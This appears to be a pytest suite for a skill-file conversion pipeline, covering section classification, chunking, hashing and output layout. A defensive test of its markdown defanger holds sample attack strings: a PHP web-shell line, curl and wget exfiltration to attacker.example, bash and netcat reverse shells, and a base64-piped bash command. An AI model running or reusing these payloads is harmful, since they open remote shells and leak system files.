| """ |
| tests/test_batch_convert.py -- pytest suite for the batch_convert module (micro-skills conversion pipeline). |
| |
| Covers: |
| - classify_section (scope / gate / build / deliver) |
| - extract_gate_questions (avoid / ensure / existing-question patterns) |
| - parse_sections (## header splitting) |
| - split_into_chunks (line-count enforcement) |
| - convert_skill (end-to-end: pipeline files, orchestrator size, hash, skip logic) |
| """ |
|
|
| import hashlib |
| import sys |
| from pathlib import Path |
| from textwrap import dedent |
|
|
| import pytest |
|
|
| |
| sys.path.insert(0, str(Path(__file__).parents[1])) |
|
|
| from batch_convert import ( |
| build_chunk_filename, |
| classify_section, |
| convert_skill, |
| defang_dangerous_markdown, |
| extract_gate_questions, |
| main as batch_convert_main, |
| parse_sections, |
| split_into_chunks, |
| ) |
|
|
| |
| |
| |
|
|
| def _make_skill_md(tmp_path: Path, content: str, name: str = "test-skill") -> Path: |
| """Write a SKILL.md under tmp_path/<name>/SKILL.md and return the path.""" |
| skill_dir = tmp_path / name |
| skill_dir.mkdir(parents=True, exist_ok=True) |
| skill_path = skill_dir / "SKILL.md" |
| skill_path.write_text(content, encoding="utf-8") |
| return skill_path |
|
|
|
|
| def _fake_skill_content(num_lines: int = 250) -> str: |
| """Return a realistic fake SKILL.md with exactly num_lines lines.""" |
| |
| header = dedent("""\ |
| --- |
| name: test-skill |
| description: "A synthetic skill for unit tests" |
| --- |
| |
| # test-skill |
| |
| ## Overview |
| |
| This skill teaches you to write production-grade code with proper structure. |
| It is used when you need to scaffold new modules quickly and consistently. |
| Prerequisites: familiarity with Python and basic design patterns. |
| Applies when: the request involves creating a new service, utility, or module. |
| Input: a plain-language description of the component needed. |
| Requirements: Python 3.11+, an active virtual environment, black installed. |
| |
| ## Prerequisites |
| |
| - Python 3.11 or newer installed and on $PATH. |
| - A virtual environment activated before running any commands. |
| - The `black` formatter available: `pip install black`. |
| - Constraint: do not use global state anywhere in the implementation. |
| - Precondition: repository root must contain a pyproject.toml. |
| |
| ## Steps |
| |
| Follow these instructions in order without skipping any step. |
| |
| """) |
|
|
| |
| footer = dedent("""\ |
| |
| ## Validation |
| |
| Run the following checks before marking the task complete. |
| - avoid leaving TODO comments in the output code. |
| - avoid hardcoded credentials or secrets. |
| - ensure every public function has a type-annotated signature. |
| - ensure the module imports cleanly with no circular dependencies. |
| - never commit debug print() statements. |
| - never expose internal implementation details through the public API. |
| |
| ## Output Format |
| |
| Present the output as a self-contained Python module. |
| Format the response with a file header comment, then all imports, then code. |
| Include an example usage block at the bottom of the file. |
| The final output should be ready to paste directly into the repository. |
| Summary: one sentence describing what was built and where to find it. |
| """) |
|
|
| header_lines = header.split("\n") |
| footer_lines = footer.split("\n") |
| fixed_count = len(header_lines) + len(footer_lines) |
| padding_needed = max(0, num_lines - fixed_count) |
|
|
| step_lines = [] |
| for i in range(1, padding_needed + 1): |
| step_lines.append( |
| f" Step {i}: Implement component {i} according to the design. " |
| f"Verify output matches spec." |
| ) |
|
|
| return "\n".join(header_lines + step_lines + footer_lines) |
|
|
|
|
| |
| |
| |
|
|
class TestClassifySection:
    """classify_section(header, body) should pick the matching pipeline stage."""

    def test_classify_section_scope(self):
        """Prerequisite / constraint / input wording is classified as scope."""
        section_body = (
            "prerequisite: Python 3.11 installed.\n"
            "constraint: no global state.\n"
            "before you begin, activate the virtual environment.\n"
            "input: a plain-language description.\n"
            "requirements: black formatter available.\n"
        )
        stage = classify_section("## Prerequisites", section_body)
        assert stage == "scope", f"Expected 'scope', got {stage!r}"

    def test_classify_section_gate(self):
        """A body dominated by avoid / ensure / never rules is classified as gate."""
        section_body = (
            "- avoid leaving TODO comments in final output.\n"
            "- ensure every function is type-annotated.\n"
            "- never expose internal details through the public API.\n"
            "- must always verify the output compiles cleanly.\n"
            "- do not commit debug print statements.\n"
            "- avoid hardcoded secrets.\n"
            "- verify the output matches the spec.\n"
        )
        stage = classify_section("## Validation Rules", section_body)
        assert stage == "gate", f"Expected 'gate', got {stage!r}"

    def test_classify_section_build(self):
        """Plain instructions without strong keywords fall back to build."""
        instructions = [
            f" Write the {n}th component of the module." for n in range(1, 12)
        ]
        stage = classify_section("## Implementation", "\n".join(instructions))
        assert stage == "build", f"Expected 'build', got {stage!r}"

    def test_classify_section_deliver(self):
        """Output / format / present wording is classified as deliver."""
        section_body = (
            "Present the final result as a self-contained Python module.\n"
            "Format the response with a file header, then imports, then code.\n"
            "Output should be usable without modification.\n"
            "Return a summary sentence describing what was built.\n"
            "The report template must be filled in completely.\n"
        )
        stage = classify_section("## Output Format", section_body)
        assert stage == "deliver", f"Expected 'deliver', got {stage!r}"
|
|
|
|
| |
| |
| |
|
|
class TestExtractGateQuestions:
    """extract_gate_questions turns rule-style bullets into YES/NO questions."""

    def test_extract_gate_questions_avoid(self):
        """An '- avoid X' bullet becomes 'Is the output free of X? YES/NO'."""
        produced = extract_gate_questions("- avoid leaving TODO comments in the output")
        assert len(produced) == 1
        assert (
            produced[0]
            == "Is the output free of leaving TODO comments in the output? YES/NO"
        )

    def test_extract_gate_questions_ensure(self):
        """An '- ensure X' bullet becomes 'Does the output X? YES/NO'."""
        produced = extract_gate_questions("- ensure every function is type-annotated")
        assert len(produced) == 1
        assert produced[0] == "Does the output every function is type-annotated? YES/NO"

    def test_extract_gate_questions_existing(self):
        """Bullets that already end in '?' are kept verbatim, minus the list marker."""
        source = (
            "- Has the output been reviewed for correctness?\n"
            "- Is every dependency pinned to a specific version?\n"
        )
        produced = extract_gate_questions(source)
        for expected in (
            "Has the output been reviewed for correctness?",
            "Is every dependency pinned to a specific version?",
        ):
            assert expected in produced

    def test_extract_gate_questions_mixed(self):
        """Each of the four mixed-pattern bullets yields one non-empty question."""
        source = (
            "- avoid hardcoded credentials\n"
            "- ensure the module imports cleanly\n"
            "- never commit debug print statements\n"
            "- Is the public API stable?\n"
        )
        produced = extract_gate_questions(source)
        assert all(q.strip() for q in produced), "No empty strings should appear"
        assert len(produced) == 4

    def test_extract_gate_questions_empty_text(self):
        """Empty or whitespace-only input produces an empty list."""
        for blank in ("", " \n\n "):
            assert extract_gate_questions(blank) == []
|
|
|
|
| |
| |
| |
|
|
class TestParseSections:
    """parse_sections splits markdown on '##' headers and extracts frontmatter."""

    def test_parse_sections_basic(self):
        """Every '##' header in the document shows up as a section header."""
        document = (
            "## Overview\n"
            "This is the overview body.\n"
            "\n"
            "## Steps\n"
            "Do step 1.\n"
            "Do step 2.\n"
            "\n"
            "## Validation\n"
            "Check everything.\n"
        )
        sections, _ = parse_sections(document)
        found = [section["header"] for section in sections]
        for expected in ("## Overview", "## Steps", "## Validation"):
            assert expected in found

    def test_parse_sections_returns_tuple(self):
        """The return value is always a 2-tuple of (sections, frontmatter)."""
        outcome = parse_sections("## Only Section\nSome body.\n")
        assert isinstance(outcome, tuple) and len(outcome) == 2

    def test_parse_sections_frontmatter_stripped(self):
        """Frontmatter is returned separately and never leaks into section headers."""
        document = (
            "---\n"
            "name: my-skill\n"
            'description: "A test"\n'
            "---\n"
            "\n"
            "## Body\n"
            "Content here.\n"
        )
        sections, frontmatter = parse_sections(document)
        assert "name: my-skill" in frontmatter
        # No section header may be a leftover '---' delimiter.
        for section in sections:
            assert not section["header"].startswith("---")

    def test_parse_sections_body_content(self):
        """A section body holds the lines that follow its header."""
        sections, _ = parse_sections("## Steps\nDo step 1.\nDo step 2.\n")
        assert len(sections) == 1
        only_body = sections[0]["body"]
        assert "Do step 1." in only_body
        assert "Do step 2." in only_body

    def test_parse_sections_no_headers(self):
        """Header-less content still comes back inside at least one section body."""
        sections, _ = parse_sections("Just some text.\nNo headers here.\n")
        assert len(sections) >= 1
        all_bodies = " ".join(section["body"] for section in sections)
        assert "Just some text." in all_bodies
|
|
|
|
| |
| |
| |
|
|
class TestSplitIntoChunks:
    """Tests for split_into_chunks plus the chunk-filename and defang helpers."""

    def test_split_into_chunks_short_text(self):
        """Text shorter than max_lines is returned as a single, unchanged chunk."""
        text = "\n".join(f"line {i}" for i in range(20))
        chunks = split_into_chunks(text, max_lines=40)
        assert len(chunks) == 1
        assert chunks[0] == text

    def test_split_into_chunks_exact_boundary(self):
        """Text with exactly max_lines lines is a single chunk."""
        text = "\n".join(f"line {i}" for i in range(40))
        chunks = split_into_chunks(text, max_lines=40)
        assert len(chunks) == 1

    def test_split_into_chunks_long_text(self):
        """100-line text with max_lines=40 produces multiple chunks."""
        lines = []
        for i in range(1, 101):
            lines.append(f"Instruction line {i}: do something useful here.")
            # A blank line every 15 instructions gives the text paragraph breaks.
            if i % 15 == 0:
                lines.append("")
        text = "\n".join(lines)
        chunks = split_into_chunks(text, max_lines=40)
        assert len(chunks) >= 2, f"Expected multiple chunks, got {len(chunks)}"

    def test_split_into_chunks_each_chunk_bounded(self):
        """Every chunk must be at most max_lines + a small tolerance (paragraph alignment)."""
        lines = []
        for i in range(1, 101):
            lines.append(f"Line {i}")
            # A blank line every 10 lines gives the text paragraph breaks.
            if i % 10 == 0:
                lines.append("")
        text = "\n".join(lines)
        max_lines = 40
        chunks = split_into_chunks(text, max_lines=max_lines)
        for chunk in chunks:
            chunk_line_count = len(chunk.split("\n"))
            # The 10-line slack is this test's own tolerance for paragraph alignment.
            assert chunk_line_count <= max_lines + 10, (
                f"Chunk has {chunk_line_count} lines, expected <= {max_lines + 10}"
            )

    def test_split_into_chunks_no_content_lost(self):
        """Joining all chunks contains all non-empty lines from the original."""
        text = "\n".join(f"important-line-{i}" for i in range(80))
        chunks = split_into_chunks(text, max_lines=30)
        rejoined = "\n".join(chunks)
        for i in range(80):
            assert f"important-line-{i}" in rejoined

    def test_build_chunk_filename_stays_filesystem_safe_after_z(self):
        """The 27th and later build chunks must not use punctuation suffixes."""
        assert build_chunk_filename(0) == "03a-build.md"
        assert build_chunk_filename(25) == "03z-build.md"
        assert build_chunk_filename(26) == "03-027-build.md"
        assert build_chunk_filename(30) == "03-031-build.md"
        assert "|" not in build_chunk_filename(26)

    def test_defang_dangerous_markdown_php_openers(self):
        """Generated markdown should not contain raw PHP openers."""
        text = "<?php system($_GET['cmd']); ?>\n<?= $value ?>"
        safe = defang_dangerous_markdown(text)
        assert "<?php" not in safe
        assert "<?=" not in safe
        # The openers must survive in an inert form rather than vanish. Checking
        # for the raw text here would contradict the two assertions above.
        # NOTE(review): HTML-entity escaping ("&lt;") is assumed -- confirm
        # against defang_dangerous_markdown.
        assert "&lt;?php" in safe
        assert "&lt;?=" in safe

    def test_defang_dangerous_markdown_command_injection_payloads(self):
        """Generated markdown should not write executable command-injection payloads."""
        text = dedent("""\
            127.0.0.1; curl http://attacker.example/?$(whoami)
            127.0.0.1 && wget https://attacker.example/$(cat /etc/passwd)
            ; bash -i >& /dev/tcp/attacker.example/4444 0>&1
            ; nc -e /bin/bash attacker.example 4444
            echo "d2hvYW1p" | base64 -d | bash
            & powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('x',4444)"
            """)

        safe = defang_dangerous_markdown(text)

        assert "curl http://" not in safe
        assert "wget https://" not in safe
        assert "$(" not in safe
        assert "bash -i" not in safe
        assert "nc -e" not in safe
        assert "| bash" not in safe
        assert "powershell -nop" not in safe.lower()
        assert "System.Net.Sockets.TCPClient" not in safe
        # A zero-width space is the expected defang marker. It is spelled as an
        # escape so the check is visible in an editor.
        # NOTE(review): the HTML-entity spelling is accepted as well -- confirm
        # which form defang_dangerous_markdown actually emits.
        assert "\u200b" in safe or "&#8203;" in safe
|
|
|
|
| |
| |
| |
|
|
class TestConvertSkill:
    """End-to-end tests for convert_skill().

    All tests use tmp_path so no real skill directories are touched.
    The fake skill is always 250 lines — well above the 180-line threshold.
    """

    @pytest.fixture()
    def skill_250(self, tmp_path: Path) -> Path:
        """250-line SKILL.md written to tmp_path/test-skill/SKILL.md."""
        content = _fake_skill_content(num_lines=250)
        return _make_skill_md(tmp_path, content, name="test-skill")

    @pytest.fixture()
    def skill_100(self, tmp_path: Path) -> Path:
        """100-line SKILL.md — below the 180-line threshold."""
        lines = ["# Short Skill\n"] + [f"Line {i}\n" for i in range(99)]
        content = "".join(lines)
        return _make_skill_md(tmp_path, content, name="short-skill")

    # ---- skip / threshold behaviour ----

    def test_convert_skill_skips_short(self, skill_100: Path):
        """Skills with <= 180 lines are skipped without creating any pipeline files."""
        result = convert_skill(skill_100)
        assert result["status"] == "skipped"
        assert "skipped" in result["reason"].lower() or "lines" in result["reason"].lower()

        # A skipped skill must not grow a references/ directory.
        refs_dir = skill_100.parent / "references"
        assert not refs_dir.exists()

    def test_convert_skill_skips_exact_threshold_with_trailing_newline(self, tmp_path: Path):
        """Exactly line_threshold lines plus a trailing newline is still skipped."""
        content = "\n".join(f"Line {i}" for i in range(180)) + "\n"
        skill = _make_skill_md(tmp_path, content, name="exact-threshold")

        result = convert_skill(skill, line_threshold=180)

        assert result["status"] == "skipped"
        assert not (skill.parent / "SKILL.md.original").exists()

    def test_convert_skill_respects_explicit_line_threshold(self, skill_100: Path):
        """A 100-line skill is converted once line_threshold is lowered to 50."""
        result = convert_skill(skill_100, line_threshold=50)

        assert result["status"] == "converted"

    # ---- conversion output ----

    def test_convert_skill_creates_pipeline(self, skill_250: Path, tmp_path: Path):
        """A 250-line skill produces SKILL.md, references/01-05, check-gates.md,
        failure-log.md, and original-hash.txt."""
        result = convert_skill(skill_250)
        assert result["status"] == "converted"

        output_dir = skill_250.parent

        # Orchestrator replaces the source file in place.
        assert (output_dir / "SKILL.md").exists(), "SKILL.md orchestrator missing"

        # Backup of the pre-conversion content.
        assert (output_dir / "SKILL.md.original").exists(), "SKILL.md.original missing"

        # Supporting files next to the orchestrator.
        assert (output_dir / "check-gates.md").exists(), "check-gates.md missing"
        assert (output_dir / "failure-log.md").exists(), "failure-log.md missing"
        assert (output_dir / "original-hash.txt").exists(), "original-hash.txt missing"

        # Stage files live under references/.
        refs_dir = output_dir / "references"
        assert refs_dir.exists(), "references/ directory missing"
        ref_files = list(refs_dir.glob("*.md"))
        assert len(ref_files) >= 5, (
            f"Expected >= 5 reference files, found {len(ref_files)}: "
            + ", ".join(f.name for f in ref_files)
        )

    def test_convert_skill_preserves_original(self, skill_250: Path):
        """After conversion, SKILL.md.original contains the original content."""
        original_content = skill_250.read_text(encoding="utf-8")
        convert_skill(skill_250)

        original_path = skill_250.parent / "SKILL.md.original"
        assert original_path.exists()
        preserved = original_path.read_text(encoding="utf-8")
        assert preserved == original_content

    def test_convert_skill_can_convert_in_memory_without_original_backup(
        self,
        tmp_path: Path,
    ):
        """Artifact packaging can convert hydrated bodies without raw backups."""
        content = _fake_skill_content(250)
        output_dir = tmp_path / "converted"

        # The source path is never written; the body is supplied via source_content.
        result = convert_skill(
            tmp_path / "virtual" / "SKILL.md",
            output_dir=output_dir,
            source_content=content,
            skill_name="remote-security-skill",
            preserve_original=False,
        )

        assert result["status"] == "converted"
        assert (output_dir / "SKILL.md").exists()
        assert (output_dir / "references" / "01-scope.md").exists()
        assert not (output_dir / "SKILL.md.original").exists()
        assert (output_dir / "original-hash.txt").read_text(encoding="utf-8").strip() == (
            hashlib.sha256(content.encode("utf-8")).hexdigest()
        )

    def test_convert_skill_orchestrator_under_30_lines(self, skill_250: Path):
        """The generated SKILL.md orchestrator file must be under 30 lines."""
        convert_skill(skill_250)

        orchestrator = skill_250.parent / "SKILL.md"
        assert orchestrator.exists()
        line_count = len(orchestrator.read_text(encoding="utf-8").split("\n"))
        assert line_count < 30, (
            f"SKILL.md orchestrator has {line_count} lines; expected < 30"
        )

    def test_convert_skill_check_gates_has_questions(self, skill_250: Path):
        """check-gates.md contains at least one YES/NO question."""
        convert_skill(skill_250)

        gates_path = skill_250.parent / "check-gates.md"
        gates_content = gates_path.read_text(encoding="utf-8")
        assert "YES/NO" in gates_content, "check-gates.md has no YES/NO questions"

        # At least one question must sit on a line that starts with a digit.
        question_lines = [
            line for line in gates_content.split("\n")
            if line.strip() and line.strip()[0].isdigit() and "YES/NO" in line
        ]
        assert len(question_lines) >= 1

    def test_convert_skill_shards_long_non_build_stage(self, tmp_path: Path):
        """Long scope/plan/check/deliver stages are split behind short indexes."""
        body = "\n".join(
            f"- Requirement {i}: preserve this constraint exactly."
            for i in range(220)
        )
        # Assemble the document line by line. Interpolating the multi-line body
        # into an indented dedent() template would leave dedent() with no common
        # margin to strip, so the frontmatter and headers would stay indented.
        content = "\n".join(
            [
                "---",
                "name: long-scope",
                'description: "Long scope test"',
                "---",
                "",
                "# long-scope",
                "",
                "## Requirements",
                "",
                body,
                "",
                "## Steps",
                "",
                "Build the requested output.",
                "",
            ]
        )
        skill = _make_skill_md(tmp_path, content, name="long-scope")
        result = convert_skill(skill)

        assert result["status"] == "converted"
        refs = skill.parent / "references"
        scope_index = refs / "01-scope.md"
        scope_shards = sorted(refs.glob("01*scope.md"))
        assert scope_index.exists()
        assert any(p.name == "01a-scope.md" for p in scope_shards)
        for path in scope_shards:
            text = path.read_text(encoding="utf-8")
            # Count lines without charging an extra one for a trailing newline.
            line_count = text.count("\n") + (1 if text and not text.endswith("\n") else 0)
            assert line_count <= 40, f"{path.name} has {line_count} lines"

    def test_convert_skill_hash_matches(self, skill_250: Path):
        """original-hash.txt contains the SHA256 of the original file content."""
        original_content = skill_250.read_text(encoding="utf-8")
        expected_hash = hashlib.sha256(original_content.encode("utf-8")).hexdigest()

        convert_skill(skill_250)

        hash_path = skill_250.parent / "original-hash.txt"
        stored = hash_path.read_text(encoding="utf-8").strip()
        assert stored == expected_hash, (
            f"Hash mismatch: stored={stored!r}, expected={expected_hash!r}"
        )

    def test_convert_skill_returns_converted_stats(self, skill_250: Path):
        """convert_skill returns a dict with all expected stat keys when converted."""
        result = convert_skill(skill_250)
        assert result["status"] == "converted"
        for key in ("skill", "original_lines", "pipeline_files", "gate_questions",
                    "max_file_lines", "build_splits", "reference_files"):
            assert key in result, f"Missing key {key!r} in result"

    def test_convert_skill_original_lines_accurate(self, skill_250: Path):
        """Returned original_lines matches the actual line count of the source."""
        content = skill_250.read_text(encoding="utf-8")
        actual_line_count = len(content.splitlines())
        result = convert_skill(skill_250)
        assert result["original_lines"] == actual_line_count

    def test_convert_skill_idempotent_on_second_call(self, skill_250: Path):
        """Running convert_skill twice on the same directory does not crash or
        destroy the already-preserved original."""
        original_content = skill_250.read_text(encoding="utf-8")

        # First call performs the real conversion.
        result1 = convert_skill(skill_250)
        assert result1["status"] == "converted"

        # Second call sees the generated orchestrator in place of the source.
        # It must complete normally and leave the backup untouched.
        result2 = convert_skill(skill_250)
        assert "status" in result2

        original_path = skill_250.parent / "SKILL.md.original"
        preserved = original_path.read_text(encoding="utf-8")
        assert preserved == original_content, (
            "SKILL.md.original was overwritten on the second call"
        )

    # ---- output_dir / path handling ----

    def test_convert_skill_respects_output_dir(self, skill_250: Path, tmp_path: Path):
        """When output_dir is supplied, pipeline files land there, not in the
        source skill directory."""
        out_dir = tmp_path / "converted_output"
        out_dir.mkdir()

        result = convert_skill(skill_250, output_dir=out_dir)
        assert result["status"] == "converted"

        assert (out_dir / "SKILL.md").exists(), "SKILL.md not in output_dir"
        assert (out_dir / "check-gates.md").exists()
        assert (out_dir / "failure-log.md").exists()
        assert (out_dir / "original-hash.txt").exists()
        assert skill_250.exists()
        refs = list((out_dir / "references").glob("*.md"))
        assert len(refs) >= 5

    def test_convert_skill_accepts_string_paths(self, skill_250: Path, tmp_path: Path):
        """wiki_orchestrator passes string paths; keep that API working."""
        out_dir = tmp_path / "converted_output"
        out_dir.mkdir()

        result = convert_skill(str(skill_250), output_dir=str(out_dir))

        assert result["status"] == "converted"
        assert skill_250.exists()
        assert (out_dir / "SKILL.md").exists()
        assert (out_dir / "references" / "01-scope.md").exists()
|
|
|
|
def test_main_file_mode_respects_min_lines(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys):
    """The CLI in --file mode converts a 100-line skill when --min-lines is 50."""
    skill_file = _make_skill_md(tmp_path, _fake_skill_content(100), name="cli-threshold")
    cli_args = ["batch_convert.py", "--file", str(skill_file), "--min-lines", "50"]
    # Swap argv so main() parses these arguments instead of pytest's own.
    monkeypatch.setattr(sys, "argv", cli_args)

    batch_convert_main()

    captured = capsys.readouterr()
    assert '"status": "converted"' in captured.out
    backup = skill_file.parent / "SKILL.md.original"
    assert backup.exists()
|
|